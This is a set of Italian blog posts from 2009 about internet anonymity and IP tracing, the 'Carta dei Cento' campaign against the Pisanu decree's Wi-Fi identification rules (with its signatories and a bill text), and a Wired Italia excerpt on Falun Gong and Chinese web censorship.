Molto spesso chi fa una cosa per far sapere che è molto furbo, riesce solo a dimostrare quanto è cretino.

Nei commenti al post qui sotto, dove si dibatteva sull’inutilità della censura su internet, uno dei commentatori, Guido dalla Germania, faceva notare che spesso i giornalisti poco ferrati sul web – e pronti a far da eco a politici che del web non capiscono nulla – strepitano a vanvera chiedendo leggi di censura, asserendo che sulla rete oggi, mancando strumenti tecnici adeguati, l’anonimato garantisce l’impunità a chiunque per diffondere proclami violenti; questa, sottolineava Guido, è una informazione solo in parte vera, perché per risalire all’identità di chi ha postato una qualsiasi cosa la polizia postale può sempre ricorrere all’indirizzo IP del mittente.

Un bontempone di passaggio, letto il commento di Guido, ha deciso di dimostrargli che aveva torto, perché sulla rete è invece facilissimo immettere commenti a caso, magari anche attribuendoli ad altri: così ha aperto i commenti al mio post e ha tentato di immetterne uno, attribuendolo a “Il Mondo di Galatea”, cioè firmandolo con il mio nick. Tutto ciò, presumo, per dimostrare a me e a Guido quanto sia facile violare un sito web e rimanere impuniti.

Quel gran genio del commentatore, però, non si è reso conto che la piattaforma wordpress non è scema: notando che la casella di posta elettronica che lui aveva associato al nick mio non è quella da cui abitualmente posto (dato che lui non conosce l’indirizzo abilitato da me per la gestione del blog) e che l’Ip non corrisponde a quello mio, ha bloccato preventivamente il commento, inviandomi un allert. E non si è reso conto che io, controllando il commento bloccato, sono subito potuta risalire al suo IP, perché esso compare sempre, al gestore del sito, in calce ai commenti.

Volendo, caro il mio IP134.171.29.12, per una cretinata del genere saresti persino passabile di denuncia alla polizia postale, che grazie al tuo IP sarebbe perfettamente in grado di venirti a pescare in casa, o in ufficio, o da dove hai postato.

Ma ti basti sapere che, cercando di mostrarti intelligente, sei riuscito solo a chiarire che sei un cretino. E pure che non sai un caspita di Internet, detto fra noi.

Segnalo, per correttezza, che IP 134.171.29.12 ha risposto qui. E io gli ho replicato questo.

Foto originale: http://h23b-stocks.deviantart.com/art/DON-T-144933158

A Barcellona si è svolto il Personal Democracy Forum 2009. Su Civico sono disponibili gli streaming degli interventi.

Inviato da: “Lavoratori Preziosi” lavoratori.preziosi@autistici.org

Ven 27 Nov 2009 8:26 am

dal blog di Mao

L’idea che Internet offra occasioni di dialogo anche tra posizioni opposte, permetta di maturare un opinione più completa su un argomento attraverso il dibattito, soffre di un peccato di presunzione.
La presunzione, o forse l’utopia, che chiunque si muova in questo mare abbia il desiderio di accettare il confronto.
Sempre più spesso vedo invece gente chiudersi a guscio sulle proprie certezze piuttosto che porsi all’ascolto di chi argomenta un’opinione distante dalla propria, vedo gente attaccare in maniera violenta, o abbandonare la discussione, quando essa tende a smuovere la terra sotto i propri piedi.
Questo perchè ascoltare gli altri è un esercizio che si impara fin da piccoli, e richiede una maturità ed una compostezza che non siamo abituati ad esercitare, e la rete non fa altro che amplificare questi nostri difetti.
Si tratta di una generalizzazione certo, ma se nelle nostre giornate tendiamo a circondarci di persone che la pensano come noi, che hanno magari la nostra stessa formazione, vivono nella nostra stessa realtà, che hanno idee simili alle nostre, siamo tentati nel riportare questo criterio all’interno dei social network, dei blog che frequentiamo. Vogliamo sempre più spesso una conferma in ciò che pensiamo, vogliamo sentirci dire di essere nel giusto, e sotto questo punto di vista la Rete offre tutte le possibili gamme di opportunità. Che tu sia Berlusconiano, AntiBerlusconiano, TeoCon, complottista, troverai sempre chi ti dirà di essere nel giusto.
Cosi, quando anche casualmente, qualcuno propone un argomento lontano dai nostri standard, perdiamo interesse o se decidiamo di affrontarlo siamo più portati allo scontro più che al dialogo.
Internet non fa che riproporre i modi che si ripropongono all’esterno e per questo, quando si parla di blogosfera molle, si dovrebbe piuttosto parlare di mollezza dei naviganti, e di un intera nazione troppo chiusa nelle proprie convinzioni per metterle in gioco.
Forse è perfino esagerato parlare di nazione, quando ancora soltanto il 10% della popolazione utilizza Internet per informarsi in maniera costruttiva, mentre ancora tutto il resto continua ad usarla per spedire mail, chattare o a vivere qualche social network soltanto come uno svago, senza ancora comprenderne a pieno le potenzialità.
Per cui, probabilmente, la situazione è perfino peggiore se perfino chi ne ha percepito le capacità ne fa un uso cosi sbandato. Quando ancora ci sarebbe da alfabetizzare un’intera nazione su questi temi.

Interessante l’articolo apparso oggi su liberazione a firma di Fabrizio Salvatori sulla presenza nel web delle lotte sociali in questo periodo di crisi.

Viene citato anche il nostro Blog.

Tutte basate sul volontariato individuale, invece, due esperienze di due singoli lavoratori: www.facebook.com/#/il.m.rosso e romanoborrelli.wordpress.com

anagrafeprecari-liberazione

L’obiettivo era creare una Carta per la liberazione dell’Wi-Fi italiano, soffocato dal decreto Pisanu. Alla fine il risultato è arrivato: imprenditori, politici, manager, blogger, giuristi e altro – in una logica bipartisan – hanno concordato il testo che potete leggere qui sotto. Oltre alla Carta e ai suoi firmatari, c’è il pezzo che uscirà domani e il testo della proposta ad hoc di legge Cassinelli-Concia: per evitare che il Wi-Fi venga strozzato ancora dalle misure questurine in vigore. Ogni altra idea per portare avanti questa piccola battaglia civile è benvenuta. LA CARTA DEI CENTO PER IL LIBERO WI-FI Il 31 dicembre 2009 sono in scadenza alcune disposizioni del cosiddetto Decreto Pisanu (”Misure urgenti per il contrasto del terrorismo internazionale”) che assoggettano la concessione dell’accesso a Internet nei pubblici esercizi a una serie di obblighi quali la richiesta di una speciale licenza al questore. Lo stesso Decreto, inoltre, obbliga i gestori di tutti gli esercizi pubblici che offrono accesso a Internet all’identificazione degli utenti tramite documento d’identità . Queste norme furono introdotte per decreto pochi giorni dopo gli attentati terroristici di Londra del luglio 2005, senza alcuna analisi d’impatto economico-sociale e senza discussione pubblica. Doveva essere provvisoria, ed è infatti già scaduta due volte (fine 2007 e fine 2008) ma è stata due volte prorogata. Si tratta di norme che non hanno alcun corrispettivo in nessun Paese democratico; nemmeno il Patriot Act USA, approvato dopo l’11 settembre 2001, prevede l’identificazione di chi si connette a Internet da una postazione pubblica. Tra gli effetti di queste norme, ce n’è uno in particolare: il freno alla diffusione di Internet via Wi-Fi, cioè senza fili. Gli oneri causati dall’obbligo di identificare i fruitori del servizio sono infatti un gigantesco disincentivo a creare reti wireless aperte. Non a caso l’Italia ha 4,806 accessi WiFi mentre in Francia ce ne sono cinque volte di più. Questa legge ha assestato un colpo durissimo alle potenzialità di crescita tecnologica e culturale di un paese già in ritardo su tutti gli indici internazionali della connettività a Internet. Nel mondo la Rete si apre sempre di più, grazie alle tecnologie wireless e ai tanti punti di accesso condivisi liberamente da privati, da istituzioni e da locali pubblici: in Italia invece abbiamo imposto lucchetti e procedure artificiali, contrarie alla sua immediatezza ed efficacia e onerose anche da un punto di vista economico. Questa politica rappresenta una limitazione nei fatti al diritto dei cittadini all’accesso alla Rete e un ostacolo per la crescita civile, democratica, scientifica ed economica del nostro Paese. Per questo, in vista della nuova scadenza del 31 dicembre, chiediamo al governo e al parlamento di non prorogare l’efficacia delle disposizioni del Decreto Pisanu in scadenza e di abrogare la previsione relativa all’obbligo di identificazione degli utenti contribuendo così a promuovere la diffusione della Rete senza fili per tutti. L’articolo per L’espresso in edicola venerdì 19 In «nessun Paese occidentale, neppure dove sono più rigorose le misure contro il terrorismo, è prevista una normativa tanto restringente in materia di identificazione di chi accede a Internet da postazioni pubbliche». E «costringere chi vuole accedere a Internet a sottoporsi alla procedura oggi prevista è un enorme disincentivo all’utilizzo della Rete». Quindi questa legge va cambiata, anche perché «la crescita economica, sociale e culturale dell’Italia non può prescindere da una piena diffusione delle moderne tecnologie di comunicazione». Chi ha scritto queste dure parole contro il cosiddetto decreto Pisanu del 2005, quello che sta soffocando il Web senza fili in Italia? Né un pirata informatico né un estremista di sinistra, ma un pacioso deputato del Popolo delle Libertà, Roberto Cassinelli. Il quale, da ex liberale, si è accorto che così com’è stata varata nel 2005 la legge ha effetti disastrosi sulla comunicazione on line in Italia. Infatti se si obbliga un fornitore pubblico di Internet a identificare con la carta d’identità chiunque usi la sua connessione, di fatto si uccide il Wi-Fi. Chiunque sia stato negli ultimi anni in una metropoli americana o europea lo sa bene: in ogni parco pubblico, panchina o coffee shop basta accendere il pc (o lo smart phone) e si trovano subito due o tre reti disponibili, gratis o a pagamento, attraverso le quali connettersi on line. In Italia, niente o quasi: e quei pochi che mettono a disposizione il proprio hot-spot devono prendersi la briga di chiedere un documento di ogni utente e di inviare i dati alla questura, un po’ come a Cuba o in Birmania. Il decreto Pisanu era stato approvato in tutta fretta sull’onda emotiva delle stragi di Al Qaeda a Londra e Madrid: si era pensato che i terroristi islamisti potessero utilizzare Internet (e in particolare i cyber point gestiti da extracomunitari) per preparare eventuali attentati sul nostro territorio. Peccato che niente del genere sia stato mai imposto da nessuno dei Paesi che veramente hanno pagato la follia omicida di Al Qaeda: nemmeno gli Stati Uniti, che dopo l’11 settembre hanno passato il Patriot Act con diverse inedite limitazioni alle libertà personali (comprese le intercettazioni del traffico dati sul Web) ma nessun obbligo di registrazione per chi si connette. Un unicum italiano, insomma. Che tra l’altro doveva essere provvisorio (con scadenza alla fine del 2007) ed è invece stato prorogato due volte, prima dal governo Prodi e poi da quello attuale. E l’aria che tira non è buona nemmeno quest’anno, con gli allarmi antiterrorismo che vengono lanciati dal ministro Maroni. Ma nonostante ciò, questa volta alcune fette di società civile e di politica hanno deciso di muoversi per tempo e di provare a sensibilizzare l’opinione pubblica prima che a dicembre il consueto decreto Milleproroghe ammazzi la Rete senza fili per un altro anno. È nata così la Carta dei Cento per il libero Wi-Fi (vedere riquadro) in cui per la prima volta si chiede al governo e al Parlamento di emancipare Internet da quella norma antistorica, che penalizza ulteriormente il nostro Paese già molto indietro nella connessione al Web rispetto al resto d’Europa. Un’iniziativa, quella dei Cento, non di parte e voluta soprattutto da imprenditori del Web (tra gli altri, il fondatore di Vitaminic Gianluca Dettori, il patron di Magnolia Giorgio Gori, il proprietario di Banzai Paolo Ainio, il creatore di Blogosfere Marco Montemagno), manager e consulenti legati all’innovazione (come Marco Pancini di Google, Alberto Fedel di Newton e Mafe de Baggis di Youplus), docenti universitari (come Abruzzese, Revelli, Vattimo, De Kerkhove, Bonaga e Marramao), direttori di fondazioni come quella creata da Montezemolo, ItaliaFutura (Andrea Romano) o quella finiana FareFuturo (Alessandro Campi), giuristi (Stefano Rodotà, Guido Scorza ed Elvira Berlingieri), ovviamente blogger (come Luca Sofri e Massimo Mantellini) e direttori di nuove testate (Tommaso Tessarolo di Current tv e Riccardo Luna di “Wired”). Ci sono anche scrittori (Elena Stancanelli, Piergiorgio Paterlini e il recente vincitore dello Strega, Tiziano Scarpa), mentre non sono moltissimi i politici, tra i quali tuttavia si segnalano Ignazio Marino, Mercedes Bresso, Ivan Scalfarotto, Marco Cappato e Giuseppe Civati. Particolarmente interessanti sono due firme vicine al mondo militare, come quella del generale (ed ex vicecomandante della Nato) Fabio Mini e dell’esperto di questioni belliche del “Giornale” Andrea Nativi: convinti anche loro che le norme in questione non abbiano alcuna efficacia nella prevenzione del terrorismo, e che quindi il decreto Pisanu, almeno nella parte che riguarda il Web, non abbia ragione di esistere. La Carta dei Cento, che verrà inviata a Berlusconi e ai capigruppo, si accompagna alla proposta di legge bipartisan di Cassinelli (è stata firmata insieme a Paola Concia, del Pd) che non liberalizzerebbe totalmente l’accesso all’WiFi ma migliorerebbe comunque l’attuale normativa: si lascerebbe ad esempio al ministro la possibilità di valutare se sopprimere integralmente la necessità di identificazione, delegandolo a stabilire «le ipotesi in cui si renda necessaria la preventiva identificazione» e in ogni caso prevede strumenti d’identificazione diversi dall’esibizione di un documento d’identità, come ad esempio un modulo on line nel quale l’utente digiterà il proprio numero di cellulare, al quale poi arriverà un sms con un codice per accedere alla Rete. Niente di rivoluzionario, e il passaggio obbligatorio del messaggino inibirebbe comunque una delle caratteristiche migliori del Web (l’immediatezza della connessione), ma un piccolo passo in avanti rispetto alle attuali misure questurine. Il che, nell’Italia di oggi, non sarebbe comunque disprezzabile. LA PROPOSTA DI LEGGE CASSINELLI-CONCIA Il decreto legge 27 luglio 2005, n. 144 (cosiddetto « decreto Pisanu »), convertito dalla legge 31 luglio 2005, n. 155, fu emanato a venti giorni di distanza dagli attentati terroristici avvenuti a Londra il 7 luglio dello stesso anno. In questo clima, il Governo allora in carica stabilì d’urgenza alcune disposizioni con l’obiettivo di garantire la sicurezza dello Stato, prevenendo il rischio di attacchi di matrice terroristica. Inizialmente, alcune parti del decreto dovevano essere provvisorie, ma sono state due volte prorogate: prima nel 2007, poi nel 2008. Tra le disposizioni ivi contenute che non hanno scadenza, ve ne sono alcune relative alle comunicazioni telefoniche e telematiche, ed all’utilizzo di postazioni pubbliche per accedere alla rete internet. Orbene, tale decreto-legge ha delegato il Ministro dell’interno ad adottare, di concerto con il Ministro delle comunicazioni ed il Ministro dell’innovazione tecnologica, una apposita regolamentazione per definire le modalità di identificazione degli utenti dei servizi di accesso ad internet tramite postazioni pubbliche (i cosiddetti internet point) o non vigilate o tramite punti di accesso pubblici a tecnologia senza fili. Il Ministro dell’interno ha così emanato il decreto 16 agosto 2005, pubblicato sulla Gazzetta Ufficiale n. 190 del giorno seguente, all’interno del quale è stabilito che i gestori degli esercizi che offrono tali servizi di connessione sono tenuti ad « identificare chi accede ai servizi telefonici e telematici offerti, prima dell’accesso stesso o dell’offerta di credenziali di accesso, acquisendo i dati anagrafici riportati su un documento di identità, nonché il tipo, il numero e la riproduzione del documento presentato dall’utente ». Dal testo del decreto, quindi, emerge chiaramente che questa procedura deve essere svolta in maniera del tutto manuale: l’utente è costretto a presentarsi fisicamente da un addetto per consegnargli il proprio documento, che questi fotocopierà ed archivierà. È evidente che questo iter fa perdere quel carattere di immediatezza ed autonomia che è tipico delle nuove tecnologie ed, in particolare, degli strumenti del web: costringere chi vuole accedere ad internet a sottoporsi a questa procedura è un enorme disincentivo all’utilizzo di punti di connessione pubblici e, conseguente, all’utilizzo della rete. Va sottolineato anche in questa sede come la crescita economica, sociale e culturale dell’Italia non possa prescindere da una piena diffusione delle moderne tecnologie di comunicazione, le quali sono al tempo stesso strumenti di comunicazione, di lavoro e luoghi di scambio e confronto democratico. La normativa attualmente in vigore è, di fatto, un freno allo sviluppo di questi strumenti e quindi alla crescita del Paese. È inoltre opportuno evidenziare che in nessun Paese occidentale, neppure laddove sono più rigorose le misure contro il terrorismo, è prevista una normativa tanto restringente in materia di necessità e modalità di identificazione di chi accede ad internet tramite postazioni pubbliche. Si pensi che neppure all’interno della legge 107-56 degli Stati Uniti d’America (il cosiddetto « USA PATRIOT Act »), firmata dal Presidente George W. Bush il 26 ottobre 2001 a seguito degli attentati dell’11 settembre, si trovano disposizioni di simile tenore. Per tutte queste ragioni, la presente proposta di legge vuole modificare l’articolo 7, comma 4, della legge 155/2005, delegando il Ministro dell’interno ad adottare, di concerto con il Ministro dello sviluppo economico ed il Ministro della pubblica amministrazione e innovazione, un decreto nel quale si stabilisca in quali ipotesi è necessaria l’identificazione dell’utente (lasciando quindi spazio a situazioni nelle quali tale identificazione non è affatto richiesta), che deve essere comunque possibile svolgere « indirettamente » e prescindendo « dall’identificazione fisica » del soggetto. Cioè, si vuole far sì che, ove il Ministro dell’interno ritenga necessario identificare l’utente, la procedura possa avvenire in maniera del tutto automatica, senza la necessità di presentare un documento d’identità, onde evitare la necessità di una personale interazione tra l’utente ed un addetto terzo. Ad esempio, il decreto del Ministro dell’interno potrà stabilire che sia consentita l’identificazione tramite carta SIM: in questo caso, per collegarsi ad internet sarà necessario inserire in una apposita schermata il proprio numero di cellulare, al quale verrà inviato automaticamente un codice da digitare per l’accesso in rete. Così, dal momento che tutte le utenze di telefonia mobile attivate da operatori italiani sono intestate a persone rintracciabili senza difficoltà, non è messa a repentaglio la sicurezza dello Stato poiché l’utente è comunque identificato, ma la procedura di identificazione avviene in maniera del tutto automatica ed autonoma, senza così che venga meno il carattere di immediatezza tipico delle nuove tecnologie. In questo modo, nel nostro Paese potrebbe finalmente crescere il numero di punti di accesso pubblici o senza fili, dando così una forte spinta allo sviluppo di internet da cui dipendono, in buona parte, le sorti dell’Italia di domani. __ ART. 1. 1. L’articolo 7, comma 4, della legge 31 luglio 2005, n. 155, di conversione del decreto-legge 27 luglio 2005, n. 144, è sostituito dal seguente: « 4. Con decreto del Ministro dell’interno di concerto con il Ministro dello sviluppo economico e con il Ministro della pubblica amministrazione e innovazione, sentito il Garante per la protezione dei dati personali, sono stabilite le misure che il titolare o il gestore di un esercizio in cui si svolgono le attività di cui al comma 1 è tenuto ad osservare per il monitoraggio delle operazioni dell’utente e per l’archiviazione dei relativi dati, anche in deroga a quanto previsto dal comma 1 dell’articolo 122, e dal comma 3 dell’articolo 123 del decreto legislativo 30 giugno 2003, n. 196, nonché le ipotesi in cui si renda necessaria la preventiva identificazione, anche indiretta, dei soggetti che utilizzano postazioni pubbliche non vigilate, ovvero punti di accesso pubblici a tecnologia senza fili, per accedere alla rete internet, specificando fra le modalità di identificazione del soggetto almeno un’ipotesi che prescinda dall’identificazione fisica del medesimo ». 2. Il decreto di cui al comma precedente è adottato entro sessanta giorni dall’entrata in vigore della presente legge. Fino alla pubblicazione di tale decreto sulla Gazzetta Ufficiale, continuano a trovare applicazione le disposizioni di cui al decreto ministeriale 16 agosto 2005 « Misure di preventiva acquisizione di dati anagrafici dei soggetti che utilizzano postazioni pubbliche non vigilate per comunicazioni telematiche ovvero punti di accesso ad Internet utilizzando tecnologia senza fili, ai sensi dell’articolo 7, comma 4, del decreto- legge 27 luglio 2005, n. 144, convertito, con modificazioni, dalla legge 31 luglio 2005, n. 155 ». (L’immagine di questo post è tratta da Wifighters.it) http://gilioli.blogautore.espresso.repubblica.it/2009/11/26/la-carta-dei-cento-per-il-libero-wi-fi/#more-5287

Dopo Wi-fight! si moltiplicano le iniziative contro la proroga del decreto Pisanu. E così, mentre il viceministro delle Comunicazioni ammette candidamente di non essere a conoscenza del problema del wi-fi nel nostro paese, domani l’Espresso dedicherà uno speciale sul tema (sperando che una copia al ministero arrivi) a supporto della proposta di legge bipartisan Cassinelli-Concia. All’articolo è associato un appello con cento firmatari:

Il 31 dicembre 2009 sono in scadenza alcune disposizioni del cosiddetto Decreto Pisanu (”Misure urgenti per il contrasto del terrorismo internazionale”) che assoggettano la concessione dell’accesso a Internet nei pubblici esercizi a una serie di obblighi quali la richiesta di una speciale licenza al questore.

Lo stesso Decreto, inoltre, obbliga i gestori di tutti gli esercizi pubblici che offrono accesso a Internet all’identificazione degli utenti tramite documento d’identità .

Queste norme furono introdotte per decreto pochi giorni dopo gli attentati terroristici di Londra del luglio 2005, senza alcuna analisi d’impatto economico-sociale e senza discussione pubblica. Doveva essere provvisoria, ed è infatti già scaduta due volte (fine 2007 e fine 2008) ma è stata due volte prorogata.

Si tratta di norme che non hanno alcun corrispettivo in nessun Paese democratico; nemmeno il Patriot Act USA, approvato dopo l’11 settembre 2001, prevede l’identificazione di chi si connette a Internet da una postazione pubblica.

Tra gli effetti di queste norme, ce n’è uno in particolare: il freno alla diffusione di Internet via Wi-Fi, cioè senza fili. Gli oneri causati dall’obbligo di identificare i fruitori del servizio sono infatti un gigantesco disincentivo a creare reti wireless aperte.

Non a caso l’Italia ha 4,806 accessi WiFi mentre in Francia ce ne sono cinque volte di più.

Questa legge ha assestato un colpo durissimo alle potenzialità di crescita tecnologica e culturale di un paese già in ritardo su tutti gli indici internazionali della connettività a Internet.

Nel mondo la Rete si apre sempre di più, grazie alle tecnologie wireless e ai tanti punti di accesso condivisi liberamente da privati, da istituzioni e da locali pubblici: in Italia invece abbiamo imposto lucchetti e procedure artificiali, contrarie alla sua immediatezza ed efficacia e onerose anche da un punto di vista economico.

Questa politica rappresenta una limitazione nei fatti al diritto dei cittadini all’accesso alla Rete e un ostacolo per la crescita civile, democratica, scientifica ed economica del nostro Paese.

Per questo, in vista della nuova scadenza del 31 dicembre, chiediamo al governo e al parlamento di non prorogare l’efficacia delle disposizioni del Decreto Pisanu in scadenza e di abrogare la previsione relativa all’obbligo di identificazione degli utenti contribuendo così a promuovere la diffusione della Rete senza fili per tutti.

FIRMATARI

Alberto Abruzzese, docente universitario

Paolo Ainio, ceo Banzai

Paolo Basilico, ceo Kairos

Paolo Barberis, presidente Dada

Elvira Berlingieri, giurista

Giovanni Boccia Artieri, docente universitario

Raffaele Bianco, consigliere comunale e blogger

Antonio Boccuzzi, parlamentare

Stefano Bonaga, docente universitario

Roberto Bonzio, giornalista e blogger

Dino Bortolotto, Assoprovider

Mercedes Bresso, presidente Regione Piemonte

Giulia Caira, artista

Giovanni Calia, docente universitario, Supervisor New Media

Alessandro Campi, docente universitario

Luisa Capelli, editrice

Marco Cappato, presidente Agorà Digitale

Roberto Casati, filosofo e docente CNRS Parigi

Marco Cavina, docente universitario

Giuseppe Civati, consigliere regionale e blogger

Gianluca Comin, presidente Federazione Relazioni Pubbliche italiana

Luca Conti, consulente e giornalista

Davide Corritore, vicepresidente Consiglio Comunale di Milano

Carlo Felice Dalla Pasqua, giornalista e blogger

Mafe De Baggis, consulente Web

Derrick De Kerkhove, docente universitario

Juan Carlos De Martin, docente universitario

Gianluca Dettori, imprenditore Web

Lorenzo Diana, Fondazione Caponnetto

Arturo Di Corinto, saggista e ricercatore

Alberto D’Ottavi, docente e blogger

Stefano Esposito, parlamentare

Alberto Fedel, ceo Newton Management Innovation

Mario Fezzi, avvocato

Franco Fileni, docente universitario

Ricky Filosa, direttore Italiachiamaitalia.net

Paolo Gentiloni, parlamentare

Marco Ghezzi, editore

Alessandro Gilioli, giornalista e blogger

Giorgio Gori, imprenditore

Giuseppe Granieri, saggista

Matteo Ulrico Hoepli, editore

Alessio Jacona, giornalista e blogger

Giorgio Jannis, progettista sociale e blogger

Manuela Kron, manager Nestlè

Daniela Lepore, urbanista, docente e blogger

Gad Lerner, giornalista

Alessandro Longo, giornalista e blogger

Francesco Loriga, Responsabile provincia WiFi – Provincia di Roma

Riccardo Luna, direttore Wired Italia

Sergio Maistrello, giornalista e blogger

Fabio Malagnino, giornalista e blogger

Massimo Mantellini, blogger

Alberto Marinelli, docente universitario

Ignazio Marino, parlamentare

Giacomo Marramao, filosofo, saggista e docente universitario

Carlo Massarini, conduttore radiotelevisivo

Marco Massarotto, consulente di comunicazione

Maria Grazia Mattei, MGM Digital Communication.

Giampiero Meani, St Microelectronics

Fabio Mini, generale ed ex vicecomandante Nato

Antonio Misiani, parlamentare e blogger

Marco Montemagno, imprenditore Web e conduttore Sky

Andrea Nativi, giornalista esperto di questioni militari

Riccardo Neri, produttore cinematografico

Luca Nicotra, Segretario Agorà Digitale

Gloria Origgi, docente CNRS Parigi

Marco Pancini, Google Italia

Lorenza Parisi, ricercatrice universitaria e blogger

Vittorio Pasteris, Giornalista

Piergiorgio Paterlini, scrittore

Matteo Penzo, cofounder Frontiers of Interaction

Gian Paolo Piazza, presidente Sunrise Advertising, responsabile settore informazione Legacoop Piemonte

Marco Pierani, Altroconsumo

Roberto Placido, vicepresidente del consiglio regionale del piemonte e blogger

Marco Revelli, storico e politologo

Stefano Rocco, Wired.it

Stefano Rodotà, giurista

Andrea Romano, direttore Fondazione Italia Futura

Gino Roncaglia, docente universitario

Massimo Russo, direttore di Kataweb

Claudio Sabelli Fioretti, giornalista e blogger

Francesco Sacco, docente universitario

Marcello Saponaro, consigliere regionale e blogger

Ivan Scalfarotto, vicepresidente del Pd e blogger

Sergio Scalpelli, dirigente d’azienda

Tiziano Scarpa, scrittore

Guido Scorza, docente universitario, presidente Istituto politiche dell’innovazione

Antonio Sofi, giornalista e blogger

Luca Sofri, giornalista e blogger

Elena Stancanelli, scrittrice

Tommaso Tessarolo, direttore Current tv

Eva Teruzzi, direttore innovazione Fiera Milano

Irene Tinagli, docente universitaria

Antonio Tombolini, imprenditore

Andrea Toso, newmedia project manager

Antonio Tursi, saggista e docente universitario

Paolo Valdemarin, imprenditore

Gianni Vattimo, docente universitario

Andrea Verde, collaboratore fondazione Farefuturo

Giancarlo Vergori, manager

Michele Vianello, direttore del Parco Scientifico e Tecnologico di Venezia

Luigi Vimercati, parlamentare

Vincenzo Vita, parlamentare

Vittorio Zambardino, giornalista e blogger

Giovanni Zanolin, assessore Pordenone

Marcella Zappaterra, presidente della Provincia di Ferrara

Giovanna Zucconi, giornalista e autrice

di Luca Sofri

È in edicola il nuovo numero di Wired dedicato alla candidatura di internet al Nobel per la pace 2010. Tra le altre ragioni di questa candidatura, pubblica anche questa.

La prima manifestazione di questa storia si svolse nel 1999, a Pechino. Circa diecimila persone si allinearono sui marciapiedi intorno a Zhongnanhai, il quartier generale del Partito Comunista e del governo cinese. Erano passati dieci anni dalle proteste di piazza Tien An Men e dalla sanguinosa repressione che ne era seguita, e da allora Zhongnanhai e il suo alto muro di cinta erano tornati a essere sorvegliati militarmente. Le persone che circondarono pacificamente il quartiere quel 25 aprile erano membri di un’organizzazione religiosa allora praticamente sconosciuta in Occidente, ma popolarissima in Cina, il Falun Gong. Si erano date convegno per protestare contro una crescente campagna di denigrazione delle loro attività da parte di autorità statali e accademiche, culminata pochi giorni prima in un articolo molto severo contro il Falun Gong e le sue pratiche pubblicato su un giornale universitario di Tientsin, la quarta città più grande della Cina. La loro divenne la più grande protesta pubblica in Cina dai tempi di Tienanmen, ma si sciolse pacificamente dopo che il primo ministro di allora, Zhu Rongji, ebbe promesso ai manifestanti di accogliere le loro richieste di maggior rispetto. Il Falun Gong è un movimento spirituale giovane, ma che è cresciuto in maniera rapida e spettacolare. Fu fondato nel 1992 da Li Hongzhi, un cinese allora quarantenne che oggi vive negli Stati Uniti e sulla cui formazione le notizie sono poche e contraddittorie. Tutto quello che riguarda il Falun Gong è avvolto da uno spessore oscuro di propaganda e contropropaganda. Da una parte le autorità cinesi lavorano da dieci anni per sostenerne la natura di “setta” o “culto” che plagia la volontà dei suoi aderenti e mette a rischio la loro salute con pratiche terapeutiche prive di fondamento scientifico. Dall’altra le complesse teorie religioso-spiritual-scientifiche del Falun Gong si sono mescolate a una potente campagna difensiva di comunicazione in cui spesso non è facile capire la verità. In mezzo, molti studiosi del Falun Gong hanno cercato di individuare le distorsioni dell’autopromozione del Falun Gong (non si può dire sia vero che non esista per niente un’organizzazione del movimento, né che alcuni i suoi promotori non ne abbiano tratto mai vantaggi economici, per esempio) senza però mettere in discussione la mostruosa persecuzione di cui i suoi membri sono vittime in Cina. Che cominciò da subito dopo quella manifestazione del 1999. Prima, il Partito Comunista aveva non solo tollerato la grande espansione del Falun Gong in Cina, ma aveva anche incentivato le sue terapie mediche e di benessere accessibili a tutti, e più economiche della medicina scientifica; e aveva tollerato le sue pratiche ginniche e di meditazione nel solco delle tradizioni cinesi di attività simili. Da tempo, però, nei confronti del Falun Gong si erando andati appuntando serie critiche scientifiche e dubbi etici insieme a timori che il suo seguito diventasse troppo forte e indipendente dalle ideologie e dalle pretese del regime comunista: si parlava di diverse decine di milioni di praticanti. La manifestazione del 25 aprile mise molta paura al governo cinese, e i dubbi leciti sul carattere del Falun Gong diventarono dal giorno dopo lo strumento di un’illecita persecuzione di massa. I primi arresti furono compiuti nei giorni immediatamente seguenti, in un’escalation di repressione che culminò nella dichiarazione di illegalità del Falun Gong, responsabile di “attività proibite, diffusione di false credenze, plagio, incitamento ai disordini e minaccia alla stabilità sociale”. La manifestazione di Zhongnanhai fu dipinta dalle autorità come un minaccioso assedio agli organi dello stato e le persecuzioni partirono, colpendo anche moltissimi responsabili del partito e delle autorità che avevano aderito al Falun Gong negli anni precedenti. Tra di loro, il padre di Shiyu Zhou.

Nel 1989 Shiyu Zhou aveva ventidue anni e studiava all’università Tsinghua, che è spesso definita una sorta di MIT cinese. Come molti altri studenti di Pechino, partecipò alle dimostrazioni in piazza Tien An Men e ne vide la repressione violenta con i suoi occhi: “Ma quando spiegavo ai miei amici e parenti nel resto della Cina cosa fosse successo in quei giorni, non mi credevano. Mi dicevano che era una sommossa controrivoluzionaria degli studenti, e che erano gli studenti ad avere aggredito e ucciso i soldati. Le immagini della tv facevano sembrare cattivi i buoni e buoni i cattivi. Fu allora che io e molti come me capimmo quale fosse la potenza della propaganda di stato, e ci convincemmo a venire via”.
Shiyu Zhou oggi vive e insegna a New York. Ha fatto il Ph.D. all’università della Pennsylvania ed è diventato un praticante del Falun Gong seguendo suo padre. “Mio padre e mia madre erano entrambi alti ufficiali dell’esercito cinese, ma le nostre condizioni di vita erano molto modeste. Quando ero ragazzo mio padre ebbe due attacchi di cuore, poi un cancro e un’operazione. Poi il cancro tornò, e lui provò ogni cosa, ogni medicina, per stare meglio: invano. E alla fine provò il Falun Gong: andava ogni giorno al parco a fare gli esercizi, con altre centinaia di persone, come avveniva allora. E cominciò a stare meglio”.
Il Falun Gong, come molte altre pratiche spirituali cinesi con cui ha affinità, teorizza una strettissima relazione tra mente e corpo, e le sue pratiche sono volte all’elevazione e alla cura di entrambi. Nel 1998 Shiyu Zhou seguì l’esempio di suo padre e divenne un praticante del Falun Gong, in Pennsylvania. L’anno successivo il Falun Gong fu dichiarato fuorilegge in Cina, e suo padre venne arrestato insieme a molti altri.
“Decisi che dovevo fare qualcosa per aiutarlo, e per aiutare tutti gli altri che ora in Cina erano perseguitati. E dove, se non su internet?”
Alla fine degli anni Novanta internet era già molto popolare e diffusa anche in Cina. Gli stessi membri del Falun Gong ne facevano grande uso per diffonderne messaggi e istruzioni, e la censura ne cominciò a colpire i siti allo stesso tempo in cui le persone venivano arrestate.
“Quando è arrivata internet, in Cina è arrivata la censura su internet. E dal 1999 si è dedicata con grande intensità al Falun Gong. All’inizio si limitavano a bloccare gli indirizzi IP dei siti malvisti. Allora noi cominciammo a spedire per email notizie e informazioni che in Cina erano nascoste: decine di migliaia di mail. Ma le autorità cinesi trovarono il modo di filtrare e bloccare anche quelle”.
